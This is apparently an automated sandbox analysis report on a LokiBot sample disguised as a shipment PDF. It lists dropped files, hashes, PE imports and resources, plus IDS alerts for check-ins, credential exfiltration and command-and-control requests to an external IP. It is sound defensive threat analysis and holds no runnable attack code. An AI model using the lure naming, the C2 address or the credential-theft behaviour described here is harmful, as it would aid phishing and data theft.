Preview:	EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6\|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....\|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....\|.....,S`..N,`...H.......\|....F. ,_...c3..........;..:&.>_L.n....f.G_T......\|.).......&.....8...&V....ia...=.....Y......&..`.l..\|.[.....Yl ....ab...,@....ib........h.._..@...3\|.P.o.ac.....+.....N.i\|sk....8..4\|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.\|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....

C:\Users\user\AppData\Local\Temp\scroll

Download File

Process:	C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.380808462993826
Encrypted:	false
SSDEEP:	1536:1jHMbKqakjVw5kil3muCrZdrK176quiA6Ez1PxTqrdW0MS2IL1n0ctMk981E:ZsbKjk41dpCrZFFAiPpAMsLV0ctMEYE
MD5:	D3C0C0E62C317E7F9E96A8F216CAA04A
SHA1:	BD95149B833CD4BA236A6E9C98CE7CBEA1FACB7D
SHA-256:	71F72891A6DC6E5DD3BC106399BC58281198A5FD145F90899654E2573E4DD609
SHA-512:	9311B46D645C6DF5B1010119C1F2BFA73112EF258C49847D2180856D934605CC2FD99F7AB376619791194E92136AF3F0075C744B43D0FD113133832335F7B65B
Malicious:	false
Reputation:	low
Preview:	...SZ8F4B935..DY.RSY8F4Fy35SCDYDRSY8F4F935SCDYDRSY8F4F935SCD.DRSW'.:F.:.r.E..s.1Q5.6K\R!")y'3=7W2.$\.G&-d0*r..kfY)]V.^NN}DRSY8F4..K...R...E...".....O......P...J...R.nk.../...U...D.....%...S..E.....#.~v...O.{.....E..0':....4F935SCD..RS.9B4.1_bSCDYDRSY.F7G229SC\|XDR.Q8F4F9..RCDIDRS.9F4Fy35CCDYFRS\8G4F935VCEYDRSY8f>F975SCDYDPSY.F4V93%SCDYTRSI8F4F93%SCDYDRSY8F4..257CDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8FdG9o5SCDYDRSY8F4F935SCDYDRSY8F4hMVM'CDY.dRY8V4F9.4SC@YDRSY8F4F935SCdYD2}+\'@'93U.CDY.SSYzF4F.25SCDYDRSY8F4Fy35.m 803SY8bjN93.RCD[DRS'9F4F935SCDYDRS.8F.hA35SCDYDrSY8F>F9.5SC.XDRSY8F4F935SCDYD.SY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F935SCDYDRSY8F4F9

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.8458026343057625
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Shipment Delivery No DE0093002-PDF.exe
File size:	965'120 bytes
MD5:	3be7ec7542039a96c3ab2fa71914aa9a
SHA1:	51afd12349217e0650067bd70a97187d90431099
SHA256:	0d0fa16ed013f13274881d27fd1cb0892e030bc9d0c274ca87ac4afef1d14080
SHA512:	b9a96a0c62cedd106edaad22391fca5e9fdac411ca169965bf8ddef151f5a3ae7e77219c688932325791edc9026da8a2a8ae8d6125bc77e1c8dc57975f1dffbc
SSDEEP:	24576:zu6J33O0c+JY5UZ+XC0kGso6Faz1aGiy5YSWY:du0c++OCvkGs9Faz1XlSY
TLSH:	CB25AD2273DDC360CB669173BF69B7016EBF7C614630B85B2F880D7DA950162262D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67BBCFAA [Mon Feb 24 01:47:22 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F2D00C5235Ah
jmp 00007F2D00C45124h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F2D00C452AAh
cmp edi, eax
jc 00007F2D00C4560Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F2D00C452A9h
rep movsb
jmp 00007F2D00C455BCh
cmp ecx, 00000080h
jc 00007F2D00C45474h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F2D00C452B0h
bt dword ptr [004BE324h], 01h
jc 00007F2D00C45780h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F2D00C4544Dh
test edi, 00000003h
jne 00007F2D00C4545Eh
test esi, 00000003h
jne 00007F2D00C4543Dh
bt edi, 02h
jnc 00007F2D00C452AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F2D00C452B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F2D00C45305h
bt esi, 03h
jnc 00007F2D00C45358h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x23028	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xeb000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x23028	0x23200	7db10d51546a93b8b61b59fb0bfe85f1	False	0.8108527024021353	data	7.572489194689622	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xeb000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1a2ee	data			1.0003822986405086
RT_GROUP_ICON	0xe9aa8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xe9b20	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xe9b34	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xe9b48	0x14	data	English	Great Britain	1.25
RT_VERSION	0xe9b5c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xe9c38	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-24T08:40:16.802412+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49731	104.21.48.1	80	TCP
2025-02-24T08:40:16.802412+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49731	104.21.48.1	80	TCP
2025-02-24T08:40:16.802412+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49731	104.21.48.1	80	TCP
2025-02-24T08:40:17.542873+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49731	104.21.48.1	80	TCP
2025-02-24T08:40:17.901955+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49732	104.21.48.1	80	TCP
2025-02-24T08:40:17.901955+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49732	104.21.48.1	80	TCP
2025-02-24T08:40:17.901955+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49732	104.21.48.1	80	TCP
2025-02-24T08:40:18.709316+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49732	104.21.48.1	80	TCP
2025-02-24T08:40:18.787788+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:18.787788+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:18.787788+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:19.532963+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:19.532963+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:19.696595+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:19.696595+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:19.696595+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:20.447785+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:20.447785+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:20.452902+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49734	TCP
2025-02-24T08:40:20.599802+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:20.599802+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:20.599802+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:21.324303+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:21.324303+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:21.503176+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49736	104.21.48.1	80	TCP
2025-02-24T08:40:21.503176+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49736	104.21.48.1	80	TCP
2025-02-24T08:40:21.503176+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49736	104.21.48.1	80	TCP
2025-02-24T08:40:22.245346+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49736	104.21.48.1	80	TCP
2025-02-24T08:40:22.245346+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49736	104.21.48.1	80	TCP
2025-02-24T08:40:22.404608+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:22.404608+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:22.404608+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:23.122370+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:23.122370+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:23.289335+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49738	104.21.48.1	80	TCP
